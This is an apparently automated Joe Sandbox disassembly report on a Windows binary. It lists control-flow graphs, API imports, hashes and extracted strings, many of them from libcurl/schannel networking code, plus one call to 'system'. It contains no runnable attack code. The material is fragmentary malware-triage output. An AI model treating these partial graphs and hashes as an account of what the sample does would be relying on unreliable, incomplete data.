call 7ff7e59f1d10 call 7ff7e5a05970 1579->1584 1580->1537 1583->1537 1584->1567 1595 7ff7e5a1a9e9-7ff7e5a1a9f0 1585->1595 1596 7ff7e5a1a9ac-7ff7e5a1a9af 1585->1596 1595->1567 1600 7ff7e5a1a9f3 call 7ff7e5a05970 1595->1600 1596->1595 1599 7ff7e5a1a9b1-7ff7e5a1a9e7 1596->1599 1599->1537 1600->1567
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: Unrecognized parameter passed via CURLOPT_SSLVERSION$http/1.1$http/1.1$ntdll$schannel: ALPN, offering %s$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                            • API String ID: 1646373207-2477831187
                                            • Opcode ID: 1c6c036b66d62122edaa9a9478bc004b9b4285ff1e5785000d92acb768e7141a
                                            • Instruction ID: 71268726a058658fa00d371bc5c98ac07b88f8e615e7268b1e3e2070d97b4fbe
                                            • Opcode Fuzzy Hash: 1c6c036b66d62122edaa9a9478bc004b9b4285ff1e5785000d92acb768e7141a
                                            • Instruction Fuzzy Hash: 7402C272B08B898AE720AB24D560BFD7BA4FF44B88F804136DA4E87791DF38D544C752

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1602 7ff7e59fb2b0-7ff7e59fb2fb calloc 1603 7ff7e59fb301-7ff7e59fb38a malloc 1602->1603 1604 7ff7e59fb43e-7ff7e59fb447 _errno 1602->1604 1605 7ff7e59fb38c-7ff7e59fb3b1 InitializeCriticalSectionEx call 7ff7e5a14a60 1603->1605 1606 7ff7e59fb3c7-7ff7e59fb3ce 1603->1606 1607 7ff7e59fb449-7ff7e59fb465 1604->1607 1614 7ff7e59fb466-7ff7e59fb47a _strdup 1605->1614 1615 7ff7e59fb3b7-7ff7e59fb3bf 1605->1615 1609 7ff7e59fb3e0-7ff7e59fb3f1 free 1606->1609 1610 7ff7e59fb3d0-7ff7e59fb3da DeleteCriticalSection free 1606->1610 1612 7ff7e59fb3f3 call 7ff7e5a18680 1609->1612 1613 7ff7e59fb3f8-7ff7e59fb400 1609->1613 1610->1609 1612->1613 1617 7ff7e59fb402 closesocket 1613->1617 1618 7ff7e59fb408-7ff7e59fb438 free 1613->1618 1614->1606 1619 7ff7e59fb480-7ff7e59fb4a0 free _strdup 1614->1619 1615->1606 1617->1618 1618->1604 1620 7ff7e59fb4a2-7ff7e59fb4b1 call 7ff7e5a18d50 1619->1620 1621 7ff7e59fb4ce-7ff7e59fb4d8 1619->1621 1625 7ff7e59fb4b6-7ff7e59fb4bc 1620->1625 1623 7ff7e59fb551-7ff7e59fb56c free 1621->1623 1624 7ff7e59fb4da-7ff7e59fb502 EnterCriticalSection LeaveCriticalSection 1621->1624 1623->1604 1626 7ff7e59fb515-7ff7e59fb518 1624->1626 1627 7ff7e59fb504-7ff7e59fb50c CloseHandle 1624->1627 1628 7ff7e59fb50e-7ff7e59fb510 1625->1628 1629 7ff7e59fb4be-7ff7e59fb4cb _errno 1625->1629 1631 7ff7e59fb522-7ff7e59fb532 call 7ff7e59fb130 free 1626->1631 1632 7ff7e59fb51a-7ff7e59fb51d call 7ff7e5a18da0 1626->1632 1630 7ff7e59fb538-7ff7e59fb53b 1627->1630 1628->1607 1629->1621 1635 7ff7e59fb53d-7ff7e59fb543 call 7ff7e59f5b00 1630->1635 1636 7ff7e59fb548-7ff7e59fb54b closesocket 1630->1636 1631->1630 1632->1631 1635->1636 1636->1623
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$CriticalSection$_errno_strdupclosesocket$CloseDeleteEnterHandleInitializeLeavecallocmallocsocket
                                            • String ID:
                                            • API String ID: 259767416-0
                                            • Opcode ID: fe9dc3e15b7135038b309508d58dd590963aa39b29c1eba6b1d019a3f51d2b9f
                                            • Instruction ID: cd440dcbf04a3442310ec8d075a8eb5410886db83b284b082a0a5fc9d6b64f8f
                                            • Opcode Fuzzy Hash: fe9dc3e15b7135038b309508d58dd590963aa39b29c1eba6b1d019a3f51d2b9f
                                            • Instruction Fuzzy Hash: 2F816E22E05B8682E624EF11E5607B9B760FB94B50F945236CB9E437A1DF7CE4E48321
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!$No connections available in cache$No connections available.$No more connections allowed to host %s: %zu$Re-using existing connection! (#%ld) with %s %s$anonymous$ftp@example.com$host$proxy
                                            • API String ID: 0-760484938
                                            • Opcode ID: efddc1f6dacb3119a96794c8e25f0bd1cf04d4b00aa7f066a4e6263cdbba1fe6
                                            • Instruction ID: 0a77eec25380dbb537604e32be0bd4ffe4fb8baa67625d0030aa757cc71af8c5
                                            • Opcode Fuzzy Hash: efddc1f6dacb3119a96794c8e25f0bd1cf04d4b00aa7f066a4e6263cdbba1fe6
                                            • Instruction Fuzzy Hash: C042B622B19B8A51EB59AB31D5607B9AB91FF45F88F844037CE5D87781DF38E460C322

                                            Control-flow Graph

                                            APIs
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59F1B61,?,?,?,?,00007FF7E59E3591), ref: 00007FF7E5A018C8
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A01911
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: callocfree
                                            • String ID: <$<$<$`$v
                                            • API String ID: 306872129-2056843887
                                            • Opcode ID: 0f6027920e8d3f7411a692dd236cf3385027a913357f224eb3018c0997195d0f
                                            • Instruction ID: 30e22df387c9f555a27fda3846498d8f522b3ddaa82bd92052f69ada4f1691d3
                                            • Opcode Fuzzy Hash: 0f6027920e8d3f7411a692dd236cf3385027a913357f224eb3018c0997195d0f
                                            • Instruction Fuzzy Hash: B3914A32A08BC586E3009F34D4143E97BA0FB55F5CF585239CE994A39ADFBAA094C721

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_errnogetpeernamegetsockname
                                            • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                            • API String ID: 2911674258-670633250
                                            • Opcode ID: 78bda30eb9f00ef79d3851da8f0a2d784c8795b32e686334d913f5884b7e80e3
                                            • Instruction ID: 5b79cb6f6ede7b09599a4a9f1c2200e122feaed5f59d2afa6119f41e4477b6de
                                            • Opcode Fuzzy Hash: 78bda30eb9f00ef79d3851da8f0a2d784c8795b32e686334d913f5884b7e80e3
                                            • Instruction Fuzzy Hash: 0F919062A18BC582D710DF25D4607F9B7A0FB89F88F845236DE4C87615EF38E185CB21

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2074 7ff7e5a186d0-7ff7e5a186fd getaddrinfo 2075 7ff7e5a18894-7ff7e5a188a1 2074->2075 2076 7ff7e5a18703-7ff7e5a18715 2074->2076 2077 7ff7e5a1871b 2076->2077 2078 7ff7e5a18874-7ff7e5a1887d WSASetLastError 2076->2078 2080 7ff7e5a18720-7ff7e5a18726 2077->2080 2079 7ff7e5a18883-7ff7e5a18890 2078->2079 2079->2075 2081 7ff7e5a18728-7ff7e5a1872b 2080->2081 2082 7ff7e5a1872d-7ff7e5a18730 2080->2082 2083 7ff7e5a18739-7ff7e5a1873d 2081->2083 2084 7ff7e5a187e1-7ff7e5a187e8 2082->2084 2085 7ff7e5a18736 2082->2085 2083->2084 2087 7ff7e5a18743-7ff7e5a1874a 2083->2087 2084->2080 2086 7ff7e5a187ee 2084->2086 2085->2083 2088 7ff7e5a18822-7ff7e5a1882f 2086->2088 2087->2084 2089 7ff7e5a18750-7ff7e5a18753 2087->2089 2091 7ff7e5a18837-7ff7e5a1883a 2088->2091 2092 7ff7e5a18831 freeaddrinfo 2088->2092 2089->2084 2090 7ff7e5a18759-7ff7e5a1876a malloc 2089->2090 2093 7ff7e5a1881c 2090->2093 2094 7ff7e5a18770-7ff7e5a187a5 malloc 2090->2094 2095 7ff7e5a1883c-7ff7e5a1883f 2091->2095 2096 7ff7e5a1886f-7ff7e5a18872 2091->2096 2092->2091 2093->2088 2099 7ff7e5a187a7-7ff7e5a187bd memcpy 2094->2099 2100 7ff7e5a1880b-7ff7e5a1881a free 2094->2100 2097 7ff7e5a1886a-7ff7e5a1886d 2095->2097 2098 7ff7e5a18841-7ff7e5a18868 free * 3 2095->2098 2096->2078 2096->2079 2097->2079 2098->2097 2098->2098 2101 7ff7e5a187ce-7ff7e5a187d8 2099->2101 2102 7ff7e5a187bf-7ff7e5a187cc _strdup 2099->2102 2100->2088 2104 7ff7e5a187da 2101->2104 2105 7ff7e5a187de 2101->2105 2102->2101 2103 7ff7e5a187f0-7ff7e5a18809 free * 2 2102->2103 2103->2088 2104->2105 2105->2084
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc$ErrorLast_strdupfreeaddrinfogetaddrinfomemcpy
                                            • String ID:
                                            • API String ID: 2364279375-0
                                            • Opcode ID: aae1654f01031a43846d7b113ef3c787abe0dcc67a0a0ca57b12d574065e3cdc
                                            • Instruction ID: 4767a389bc155e0f0dbf2413027483e52e7a873dc7e07e0f2255b5c4dede480a
                                            • Opcode Fuzzy Hash: aae1654f01031a43846d7b113ef3c787abe0dcc67a0a0ca57b12d574065e3cdc
                                            • Instruction Fuzzy Hash: E5512F75B09B4A86EA25AF11A660A39FBA1FF44F90F944036CE8E93750DF3CE444C721

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2106 7ff7e5a15fe0-7ff7e5a16025 2107 7ff7e5a16027-7ff7e5a1602a 2106->2107 2108 7ff7e5a1605b-7ff7e5a16075 2106->2108 2107->2108 2109 7ff7e5a1602c-7ff7e5a1602f 2107->2109 2110 7ff7e5a16077-7ff7e5a16087 2108->2110 2111 7ff7e5a1608c-7ff7e5a160a7 2108->2111 2109->2108 2112 7ff7e5a16031-7ff7e5a16034 2109->2112 2110->2111 2113 7ff7e5a16137-7ff7e5a16143 2111->2113 2114 7ff7e5a160ad-7ff7e5a160b2 2111->2114 2115 7ff7e5a16054-7ff7e5a16056 2112->2115 2116 7ff7e5a16036 2112->2116 2117 7ff7e5a16190-7ff7e5a1619a 2113->2117 2118 7ff7e5a16145-7ff7e5a16159 2113->2118 2119 7ff7e5a160c7-7ff7e5a160ca 2114->2119 2120 7ff7e5a160b4-7ff7e5a160be 2114->2120 2125 7ff7e5a162fd 2115->2125 2123 7ff7e5a16038-7ff7e5a16046 WSASetLastError 2116->2123 2124 7ff7e5a1604b-7ff7e5a1604e Sleep 2116->2124 2121 7ff7e5a1619c-7ff7e5a1619f 2117->2121 2122 7ff7e5a161d3-7ff7e5a161db 2117->2122 2126 7ff7e5a1615b 2118->2126 2127 7ff7e5a1616f-7ff7e5a16171 2118->2127 2129 7ff7e5a160cc-7ff7e5a160d0 2119->2129 2130 7ff7e5a160ed-7ff7e5a160f2 2119->2130 2120->2119 2128 7ff7e5a160c0-7ff7e5a160c5 2120->2128 2121->2122 2134 7ff7e5a161a1-7ff7e5a161a3 2121->2134 2135 7ff7e5a161dd-7ff7e5a161e0 2122->2135 2136 7ff7e5a161e2 2122->2136 2123->2125 2124->2115 2131 7ff7e5a162ff-7ff7e5a1631f call 7ff7e5a3f580 2125->2131 2137 7ff7e5a16160-7ff7e5a16167 2126->2137 2138 7ff7e5a16189-7ff7e5a1618c 2127->2138 2139 7ff7e5a16173-7ff7e5a16176 2127->2139 2128->2119 2128->2120 2129->2130 2140 7ff7e5a160d2-7ff7e5a160e6 2129->2140 2132 7ff7e5a16104-7ff7e5a1610e 2130->2132 2133 7ff7e5a160f4-7ff7e5a160fb 2130->2133 2144 7ff7e5a1612b-7ff7e5a16133 2132->2144 2145 7ff7e5a16110-7ff7e5a16118 2132->2145 2133->2132 2142 7ff7e5a160fd-7ff7e5a16102 2133->2142 2134->2122 2143 7ff7e5a161a5-7ff7e5a161a8 2134->2143 2146 7ff7e5a1621a-7ff7e5a1624a select 2135->2146 2147 7ff7e5a16210-7ff7e5a16213 2136->2147 2148 7ff7e5a161e4-7ff7e5a1620e 2136->2148 2137->2127 2149 7ff7e5a16169-7ff7e5a1616d 2137->2149 2138->2117 2139->2138 2150 7ff7e5a16178-7ff7e5a16185 2139->2150 2140->2130 2142->2132 2142->2133 2152 7ff7e5a161aa-7ff7e5a161ac 2143->2152 2153 7ff7e5a161b1 2143->2153 2144->2113 2145->2144 2154 7ff7e5a1611a-7ff7e5a16127 2145->2154 2156 7ff7e5a16250-7ff7e5a1625a 2146->2156 2147->2146 2155 7ff7e5a16215 2147->2155 2148->2146 2149->2127 2149->2137 2150->2138 2152->2156 2159 7ff7e5a161b3-7ff7e5a161c1 WSASetLastError 2153->2159 2160 7ff7e5a161c6-7ff7e5a161d1 Sleep 2153->2160 2154->2144 2155->2146 2157 7ff7e5a1625c-7ff7e5a1625f 2156->2157 2158 7ff7e5a16264 2156->2158 2157->2131 2161 7ff7e5a1626d-7ff7e5a16270 2158->2161 2162 7ff7e5a16266-7ff7e5a16268 2158->2162 2159->2156 2160->2156 2163 7ff7e5a1629f-7ff7e5a162a2 2161->2163 2164 7ff7e5a16272-7ff7e5a1629a __WSAFDIsSet * 2 2161->2164 2162->2131 2166 7ff7e5a162ce-7ff7e5a162d1 2163->2166 2167 7ff7e5a162a4-7ff7e5a162b5 __WSAFDIsSet 2163->2167 2164->2163 2165 7ff7e5a1629c 2164->2165 2165->2163 2166->2125 2170 7ff7e5a162d3-7ff7e5a162e4 __WSAFDIsSet 2166->2170 2168 7ff7e5a162b7 2167->2168 2169 7ff7e5a162ba-7ff7e5a162c9 __WSAFDIsSet 2167->2169 2168->2169 2169->2166 2171 7ff7e5a162cb 2169->2171 2172 7ff7e5a162e9-7ff7e5a162f8 __WSAFDIsSet 2170->2172 2173 7ff7e5a162e6 2170->2173 2171->2166 2172->2125 2174 7ff7e5a162fa 2172->2174 2173->2172 2174->2125
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastSleep
                                            • String ID:
                                            • API String ID: 1458359878-0
                                            • Opcode ID: 363319e16a2b8222d8df7e59ba0061303e8eba5504a98dbbef40f9d959649e26
                                            • Instruction ID: 3e456775511b5ffc075d0a6ab2bb083ee420bc8ab7623e607e96aff75f25b5de
                                            • Opcode Fuzzy Hash: 363319e16a2b8222d8df7e59ba0061303e8eba5504a98dbbef40f9d959649e26
                                            • Instruction Fuzzy Hash: 7C915EB1F0C64686EB646E289A60BB9EA91FF44B44FD04136DA1DCBFC5DF3CD9008611
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: calloc
                                            • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'$Unix socket path too long: '%s'
                                            • API String ID: 2635317215-3812100122
                                            • Opcode ID: d745ec9ae58cf2da707b93dddb6ae0445aae9b10f91d28d0416c49dab86b07c7
                                            • Instruction ID: 875a86d5c6775514a2206adaf0eb14889da72ec2d42a42b18b20a330c2b14bae
                                            • Opcode Fuzzy Hash: d745ec9ae58cf2da707b93dddb6ae0445aae9b10f91d28d0416c49dab86b07c7
                                            • Instruction Fuzzy Hash: 1F51C421B1C68A82F619BB35A460B79ABD0FF48B94F940036DB5D83390EF3DE5518B21
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: system
                                            • String ID: .8$h%49
                                            • API String ID: 3377271179-4206735779
                                            • Opcode ID: e1d3076ed9d51c2f839fb864ec69f16c8f30c31a97545b534a8eb50fa7e2259f
                                            • Instruction ID: 552880355fede25a41b6f270e9eb6b5ccb68013438c92459d3bd7b138eff9b54
                                            • Opcode Fuzzy Hash: e1d3076ed9d51c2f839fb864ec69f16c8f30c31a97545b534a8eb50fa7e2259f
                                            • Instruction Fuzzy Hash: 10617322E187DA89F301DFB8E8156BCBB70BB99B48F406239CFC565E15EB785108C365
                                            APIs
                                              • Part of subcall function 00007FF7E5A186D0: getaddrinfo.WS2_32 ref: 00007FF7E5A186F2
                                              • Part of subcall function 00007FF7E5A186D0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A1875E
                                              • Part of subcall function 00007FF7E5A186D0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A18798
                                              • Part of subcall function 00007FF7E5A186D0: memcpy.VCRUNTIME140(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A187B1
                                              • Part of subcall function 00007FF7E5A186D0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A187BF
                                              • Part of subcall function 00007FF7E5A186D0: freeaddrinfo.WS2_32(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A18831
                                              • Part of subcall function 00007FF7E5A186D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A18845
                                              • Part of subcall function 00007FF7E5A186D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A1884F
                                              • Part of subcall function 00007FF7E5A186D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E59FB1F5), ref: 00007FF7E5A1885C
                                            • WSAGetLastError.WS2_32 ref: 00007FF7E59FB1FB
                                            • WSAGetLastError.WS2_32 ref: 00007FF7E59FB205
                                            • EnterCriticalSection.KERNEL32 ref: 00007FF7E59FB220
                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF7E59FB22F
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FB240
                                            • send.WS2_32 ref: 00007FF7E59FB263
                                            • WSAGetLastError.WS2_32 ref: 00007FF7E59FB26D
                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF7E59FB280
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$CriticalErrorLastSection$Leavemalloc$Enter_strdupfreeaddrinfogetaddrinfomemcpysend
                                            • String ID:
                                            • API String ID: 506363382-0
                                            • Opcode ID: bf152be5e74fb760d3c049dad89691837c5dff5b7d510eaca98c6ec77837753b
                                            • Instruction ID: 0b9725a9763331fa2a1542f09fab7a61918de480952c01551bda98cf73c48665
                                            • Opcode Fuzzy Hash: bf152be5e74fb760d3c049dad89691837c5dff5b7d510eaca98c6ec77837753b
                                            • Instruction Fuzzy Hash: C7315032B0864A86EB40AF65E4607ADBBA0FF44F98F944132DA5EC3694DF3CD445C762
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastSleep
                                            • String ID:
                                            • API String ID: 1458359878-0
                                            • Opcode ID: e3f0b53e7d0d702f4cea96a3ea50b309b15a16bcda6c46903225a8fb009487bc
                                            • Instruction ID: fa14f90644b10ddcbdf193c21787ceb4e9f1bba83bd649349c8a95b2d975ee48
                                            • Opcode Fuzzy Hash: e3f0b53e7d0d702f4cea96a3ea50b309b15a16bcda6c46903225a8fb009487bc
                                            • Instruction Fuzzy Hash: 93A14C71B1865A86EB797B149520B79AA95FF48FD4F804236E91EC77C4DF3CD8008B21
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                            • API String ID: 3056473165-3891197721
                                            • Opcode ID: 3a4e271d13577e66c4e7b199b2b74668bd8fb6e9ad094e93a6e2e9a7a93d1c40
                                            • Instruction ID: 3f686357e02dd66ca024aeafb8ff9237935d4220bda5a707fbf8670a5d81e993
                                            • Opcode Fuzzy Hash: 3a4e271d13577e66c4e7b199b2b74668bd8fb6e9ad094e93a6e2e9a7a93d1c40
                                            • Instruction Fuzzy Hash: 4B718F72B04B098AEB10DB65D560BAD7BA1FF48BA8F500636DE2D877D4EE38D4058711
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
